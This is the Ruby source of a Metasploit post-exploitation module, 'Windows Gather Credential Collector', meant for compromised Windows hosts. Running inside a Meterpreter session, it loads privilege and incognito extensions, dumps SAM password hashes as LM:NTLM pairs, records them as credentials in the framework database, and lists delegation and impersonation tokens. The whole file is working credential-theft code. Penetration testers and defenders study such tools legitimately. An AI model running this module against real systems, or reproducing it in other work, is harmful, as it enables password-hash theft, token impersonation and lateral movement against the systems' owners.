1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Auxiliary::Report
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Windows Gather Credential Collector',
14
        'Description' => %q{
15
          This module harvests credentials found on the host and stores them in the database.
16
        },
17
        'License' => MSF_LICENSE,
18
        'Author' => [ 'tebo[at]attackresearch.com'],
19
        'Platform' => [ 'win' ],
20
        'SessionTypes' => [ 'meterpreter'],
21
        'Notes' => {
22
          'Stability' => [CRASH_SAFE],
23
          'SideEffects' => [],
24
          'Reliability' => []
25
        },
26
        'Compat' => {
27
          'Meterpreter' => {
28
            'Commands' => %w[
29
              incognito_list_tokens
30
              priv_passwd_get_sam_hashes
31
            ]
32
          }
33
        }
34
      )
35
    )
36
  end
37

38
  def run
39
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
40
    print_status("Running module against #{hostname} (#{session.session_host})")
41

42
    # Make sure we're rockin Priv and Incognito
43
    session.core.use('priv') if !session.priv
44
    session.core.use('incognito') if !session.incognito
45

46
    # It wasn't me mom! Stinko did it!
47
    begin
48
      hashes = client.priv.sam_hashes
49
    rescue StandardError
50
      fail_with(Failure::Unknown, "Error accessing hashes, did you migrate to a process that matched the target's architecture?")
51
    end
52

53
    # Target infos for the db record
54
    addr = session.session_host
55
    # client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
56

57
    # Record hashes to the running db instance
58
    print_good('Collecting hashes...')
59

60
    hashes.each do |hash|
61
      # Build service information
62
      service_data = {
63
        address: addr,
64
        port: 445,
65
        service_name: 'smb',
66
        protocol: 'tcp'
67
      }
68

69
      # Build credential information
70
      credential_data = {
71
        origin_type: :session,
72
        session_id: session_db_id,
73
        post_reference_name: refname,
74
        private_type: :ntlm_hash,
75
        private_data: hash.lanman + ':' + hash.ntlm,
76
        username: hash.user_name,
77
        workspace_id: myworkspace_id
78
      }
79

80
      credential_data.merge!(service_data)
81
      credential_core = create_credential(credential_data)
82

83
      # Assemble the options hash for creating the Metasploit::Credential::Login object
84
      login_data = {
85
        core: credential_core,
86
        status: Metasploit::Model::Login::Status::UNTRIED,
87
        workspace_id: myworkspace_id
88
      }
89

90
      login_data.merge!(service_data)
91
      create_credential_login(login_data)
92

93
      print_line "    Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}"
94
    end
95

96
    # Record user tokens
97
    tokens = session.incognito.incognito_list_tokens(0)
98
    raise Rex::Script::Completed if !tokens
99

100
    # Meh, tokens come to us as a formatted string
101
    print_good 'Collecting tokens...'
102
    (tokens['delegation'] + tokens['impersonation']).split("\n").each do |token|
103
      data = {}
104
      data[:host] = addr
105
      data[:type] = 'smb_token'
106
      data[:data] = token
107
      data[:update] = :unique_data
108

109
      print_line "    #{data[:data]}"
110

111
      report_note(data)
112
    end
113
  end
114
end
115

116